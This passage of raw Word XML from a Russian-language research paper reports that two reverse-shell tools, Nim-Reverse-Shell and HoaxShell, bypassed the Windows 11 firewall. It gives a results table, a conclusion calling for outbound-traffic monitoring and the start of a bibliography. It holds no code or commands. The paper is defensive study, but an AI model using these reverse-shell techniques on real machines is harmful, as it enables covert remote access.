          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">В первом случае, при использовании Nim-Reverse-Shell, </w:t>
      </w:r>
      <w:r w:rsidR="00F141E1" w:rsidRPr="00F141E1">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>был скомпилирован исполняемый файл, имитирующий реверсивную оболочку</w:t>
      </w:r>
      <w:r w:rsidRPr="005E3BA7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>, перенес</w:t>
      </w:r>
      <w:r w:rsidR="00F141E1">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>ён</w:t>
      </w:r>
      <w:r w:rsidRPr="005E3BA7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> на целевую машину с Windows и инициирова</w:t>
      </w:r>
      <w:r w:rsidR="00F141E1">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>но</w:t>
      </w:r>
      <w:r w:rsidRPr="005E3BA7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> обратное </w:t>
      </w:r>
      <w:r w:rsidRPr="005E3BA7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>подключение. Несмотря на активный брандмауэр</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005E3BA7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> reverse-shell с использованием Netcat </w:t>
      </w:r>
      <w:r>
        <w:t>Listener</w:t>
      </w:r>
      <w:r w:rsidRPr="005E3BA7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> был установлен без препятствий. В процессе тестирования инициированное соединение не было заблокировано системой.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7402A3" w14:textId="77777777" w:rsidR="005E3BA7" w:rsidRDefault="005E3BA7" w:rsidP="005E3BA7">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E3BA7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Во втором случае, при использовании HoaxShell, был запущен сервер на атакующей машине, сформирована обфусцированная PowerShell-команда и выполнен запуск на целевой машине. Обратное соединение было установлено мгновенно, а </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>файрвол</w:t>
      </w:r>
      <w:r w:rsidRPr="005E3BA7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows не смог предотвратить выполнение команды и выход трафика на указанный адрес. Аналогично первому способу, соединение не вызвало тревоги у защитных механизмов системы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C95E6D3" w14:textId="77777777" w:rsidR="003E2D07" w:rsidRPr="006647F8" w:rsidRDefault="003E2D07" w:rsidP="005E3BA7">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E2D07">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Результаты тестирования сведены в таблицу 1, демонстрируя ключевые параметры и эффективность обоих инструментов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC53506" w14:textId="77777777" w:rsidR="006647F8" w:rsidRDefault="006647F8" w:rsidP="006647F8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Таблица 1 – Сравнение инструментов</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a8"/>
        <w:tblW w:w="11002" w:type="dxa"/>
        <w:tblInd w:w="-714" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2323"/>
        <w:gridCol w:w="1559"/>
        <w:gridCol w:w="1402"/>
        <w:gridCol w:w="1880"/>
        <w:gridCol w:w="1919"/>
        <w:gridCol w:w="1919"/>
      </w:tblGrid>
      <w:tr w:rsidR="006647F8" w14:paraId="1D6D6132" w14:textId="77777777" w:rsidTr="006647F8">
        <w:trPr>
          <w:trHeight w:val="1022"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2323" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="318FF123" w14:textId="77777777" w:rsidR="006647F8" w:rsidRPr="006647F8" w:rsidRDefault="006647F8" w:rsidP="00376944">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006647F8">
              <w:rPr>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Инструмент</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7A2289E7" w14:textId="77777777" w:rsidR="006647F8" w:rsidRPr="006647F8" w:rsidRDefault="006647F8" w:rsidP="00376944">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006647F8">
              <w:rPr>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Протокол</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1402" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1A1159FB" w14:textId="77777777" w:rsidR="006647F8" w:rsidRPr="006647F8" w:rsidRDefault="006647F8" w:rsidP="00376944">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006647F8">
              <w:rPr>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Порт</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1880" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="26B5BDCA" w14:textId="77777777" w:rsidR="006647F8" w:rsidRPr="006647F8" w:rsidRDefault="006647F8" w:rsidP="00376944">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006647F8">
              <w:rPr>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Метод подключения</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1919" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="253EAC6D" w14:textId="77777777" w:rsidR="006647F8" w:rsidRPr="006647F8" w:rsidRDefault="006647F8" w:rsidP="00376944">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006647F8">
              <w:rPr>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Обнаружение файрволом</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1919" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7069945B" w14:textId="77777777" w:rsidR="006647F8" w:rsidRPr="006647F8" w:rsidRDefault="006647F8" w:rsidP="00376944">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006647F8">
              <w:rPr>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Успешность обхода</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006647F8" w14:paraId="197DFC50" w14:textId="77777777" w:rsidTr="006647F8">
        <w:trPr>
          <w:trHeight w:val="520"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2323" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="083671A4" w14:textId="77777777" w:rsidR="006647F8" w:rsidRPr="006647F8" w:rsidRDefault="006647F8" w:rsidP="00376944">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006647F8">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Nim-Reverse-Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2BB25614" w14:textId="77777777" w:rsidR="006647F8" w:rsidRPr="006647F8" w:rsidRDefault="006647F8" w:rsidP="00376944">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>TCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1402" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="739D0B43" w14:textId="77777777" w:rsidR="006647F8" w:rsidRPr="006647F8" w:rsidRDefault="006647F8" w:rsidP="00376944">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006647F8">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>443</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1880" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6AC60CE9" w14:textId="77777777" w:rsidR="006647F8" w:rsidRPr="006647F8" w:rsidRDefault="004A515A" w:rsidP="00376944">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">Исполняемый </w:t>
            </w:r>
            <w:r w:rsidR="006647F8" w:rsidRPr="006647F8">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">.exe </w:t>
            </w:r>
            <w:r w:rsidR="006647F8" w:rsidRPr="006647F8">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>файл</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1919" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4AEA4559" w14:textId="77777777" w:rsidR="006647F8" w:rsidRPr="006647F8" w:rsidRDefault="006647F8" w:rsidP="00376944">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006647F8">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Нет</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1919" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1873472B" w14:textId="77777777" w:rsidR="006647F8" w:rsidRPr="006647F8" w:rsidRDefault="006647F8" w:rsidP="00376944">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006647F8">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Да</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006647F8" w14:paraId="26D7B0ED" w14:textId="77777777" w:rsidTr="006647F8">
        <w:trPr>
          <w:trHeight w:val="502"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2323" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="11454BAD" w14:textId="77777777" w:rsidR="006647F8" w:rsidRPr="006647F8" w:rsidRDefault="006647F8" w:rsidP="00376944">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006647F8">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>HoaxShell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2A74F1AF" w14:textId="77777777" w:rsidR="006647F8" w:rsidRPr="006647F8" w:rsidRDefault="006647F8" w:rsidP="00376944">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006647F8">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1402" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="63688523" w14:textId="77777777" w:rsidR="006647F8" w:rsidRPr="006647F8" w:rsidRDefault="006647F8" w:rsidP="00376944">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006647F8">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>8000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1880" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3BC88341" w14:textId="77777777" w:rsidR="006647F8" w:rsidRPr="006647F8" w:rsidRDefault="006647F8" w:rsidP="00376944">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006647F8">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">PowerShell </w:t>
            </w:r>
            <w:r w:rsidRPr="006647F8">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>скрипт</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1919" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="166031E7" w14:textId="77777777" w:rsidR="006647F8" w:rsidRPr="006647F8" w:rsidRDefault="006647F8" w:rsidP="00376944">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006647F8">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Нет</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1919" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="036723DE" w14:textId="77777777" w:rsidR="006647F8" w:rsidRPr="006647F8" w:rsidRDefault="006647F8" w:rsidP="00376944">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006647F8">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Да</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3BAB2D32" w14:textId="77777777" w:rsidR="005E3BA7" w:rsidRDefault="005E3BA7" w:rsidP="005E3BA7">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E3BA7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Полученные результаты подтверждают, что при использовании реверсивных оболочек возможно эффективное обходное подключение к системе даже при включённой стандартной защите Windows 11. Это указывает на наличие уязвим</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>остей системы</w:t>
      </w:r>
      <w:r w:rsidRPr="005E3BA7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, через которые потенциальный злоумышленник может получить удалённый доступ без необходимости вмешательства в настройки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>файрвола</w:t>
      </w:r>
      <w:r w:rsidRPr="005E3BA7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>. Тест</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>ирование</w:t>
      </w:r>
      <w:r w:rsidRPr="005E3BA7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> показал</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="005E3BA7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> высокую эффективность скрытого внедрения вредоносных компонентов и трудности их обнаружения существующими средствами защиты.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F19A60" w14:textId="77777777" w:rsidR="005E3BA7" w:rsidRPr="00C0330B" w:rsidRDefault="005E3BA7" w:rsidP="005E3BA7">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FBC2C18" w14:textId="77777777" w:rsidR="00C148FC" w:rsidRDefault="00C148FC" w:rsidP="00C148FC">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Заключение</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F458AE" w14:textId="77777777" w:rsidR="006647F8" w:rsidRDefault="006647F8" w:rsidP="007633F6">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006647F8">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Проведённое исследование направлено на изучение эффективности механизмов защиты Windows Firewall при противодействии техникам удалённого управления, основанным на использовании реверсивных оболочек. В рамках работы были сформулированы задачи, связанные с анализом устойчивости встроенного файрвола Windows 11 к подобным атак</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>ам</w:t>
      </w:r>
      <w:r w:rsidRPr="006647F8">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, а также проведено тестирование инструментов, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>таких как</w:t>
      </w:r>
      <w:r w:rsidRPr="006647F8">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nim-Reverse-Shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidRPr="006647F8">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>HoaxShell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FADB63" w14:textId="77777777" w:rsidR="007633F6" w:rsidRPr="007633F6" w:rsidRDefault="006647F8" w:rsidP="007633F6">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006647F8">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Полученные в ходе экспериментов данные демонстрируют, что современные реверсивные оболочки способны инициировать соединения, обходя ограничения на входящие подключения, предусмотренные Windows Firewall. Особенно критичным является то, что такие соединения зачастую остаются незаметными для стандартных антивирусных решений и систем обнаружения вторжений.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABF2614" w14:textId="77777777" w:rsidR="006647F8" w:rsidRDefault="006647F8" w:rsidP="007633F6">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006647F8">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Анализ инструментов выявил, что основное преимущество реверсивных оболочек заключается в инициировании исходящего соединения с атакуемой машины, что позволяет им беспрепятственно преодолевать политики межсетевого экрана. Это указывает на необходимость пересмотра подходов к мониторингу исходящего трафика и внедрения дополнительных механизмов поведенческого анализа.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5224A12F" w14:textId="77777777" w:rsidR="006647F8" w:rsidRDefault="006647F8" w:rsidP="006647F8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006647F8">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Таким образом, исследование подтверждает, что при текущих реализациях Windows Firewall остаются уязвимости, связанные с реверсивными каналами связи. Выводы работы подчёркивают значимость дальнейших научных исследований в области разработки средств раннего обнаружения подобных техник, а также актуальность повышения квалификации специалистов в области информационной безопасности в контексте динамично развивающихся методов обхода систем защиты.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624872B2" w14:textId="77777777" w:rsidR="00C148FC" w:rsidRDefault="00C148FC" w:rsidP="00C148FC">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Список литературы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106502B7" w14:textId="77777777" w:rsidR="00E852AE" w:rsidRDefault="00E852AE" w:rsidP="00E852AE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC50F0">
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC50F0">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> /  [Электронный ресурс] // Википедия : [сайт]. — </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC50F0">
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC50F0">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC50F0">
        <w:t>https</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC50F0">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>://</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC50F0">
        <w:t>ru</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC50F0">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC50F0">
        <w:t>wikipedia</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC50F0">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC50F0">
        <w:t>org</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC50F0">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC50F0">
        <w:t>wiki</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC50F0">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC50F0">
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC50F0">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> (дата обращения: 10.04.2025).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E25D71D" w14:textId="77777777" w:rsidR="00E852AE" w:rsidRDefault="002A161B" w:rsidP="00E852AE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Брандмауэр</w:t>
      </w:r>
      <w:r w:rsidR="00E852AE" w:rsidRPr="00FC50F0">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows /  [Электронный ресурс] // Википедия : [сайт]. — URL: https://ru.wikipedia.org/wiki/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Брандмауэр</w:t>
      </w:r>
      <w:r w:rsidR="00E852AE" w:rsidRPr="00FC50F0">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">_Windows (дата обращения: </w:t>
      </w:r>
      <w:r w:rsidR="00E852AE">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidR="00E852AE" w:rsidRPr="00FC50F0">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.04.2025).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBA2297" w14:textId="77777777" w:rsidR="00E852AE" w:rsidRDefault="00E852AE" w:rsidP="00E852AE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
